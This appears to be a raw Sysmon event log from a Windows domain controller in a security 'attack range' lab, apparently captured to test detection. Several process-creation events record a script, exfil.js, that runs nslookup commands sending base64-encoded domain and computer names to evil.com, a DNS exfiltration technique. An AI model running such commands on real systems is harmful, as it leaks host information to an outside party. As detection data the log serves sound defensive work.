10341000x8000000000000000206111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7342-000000005F02}7848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-18E0-629A-6742-000000005F02}39762520C:\Windows\System32\WScript.exe{2E1864BB-18E3-629A-7342-000000005F02}7848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.127{2E1864BB-18E3-629A-7342-000000005F02}7848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3673CCA3D4DA99B1F7B734481381C6A,SHA256=6E2AC4909272F6675207FDEB50A33205ACF59F7F90EFA76A2B90AC579D0607E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlymth.tmpMD5=13DAE9C9CF6ADD4F8F46BEAD8C3CC212,SHA256=2DEC16DD493989E01C6A3048EE3C7ECCED532832FC7BFFA4BF3297D9C89C0784,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7242-000000005F02}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7242-000000005F02}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18E3-629A-7242-000000005F02}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.114{2E1864BB-18E3-629A-7242-000000005F02}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000206098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.075{2E1864BB-18E3-629A-7042-000000005F02}81562932C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7142-000000005F02}4928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.075{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.075{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.075{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.075{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7142-000000005F02}4928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.075{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.075{2E1864BB-18E3-629A-6F42-000000005F02}74006260C:\Windows\system32\cmd.exe{2E1864BB-18E3-629A-7142-000000005F02}4928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.078{2E1864BB-18E3-629A-7142-000000005F02}4928C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E3-629A-6F42-000000005F02}7400C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlymth.tmp 2>&1 10341000x8000000000000000206090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.044{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7042-000000005F02}8156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.044{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7042-000000005F02}8156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.044{2E1864BB-18E3-629A-7042-000000005F02}81562932C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-6F42-000000005F02}7400C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.029{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7042-000000005F02}8156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.013{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-6F42-000000005F02}7400C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.013{2E1864BB-18E0-629A-6742-000000005F02}39766032C:\Windows\System32\WScript.exe{2E1864BB-18E3-629A-6F42-000000005F02}7400C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 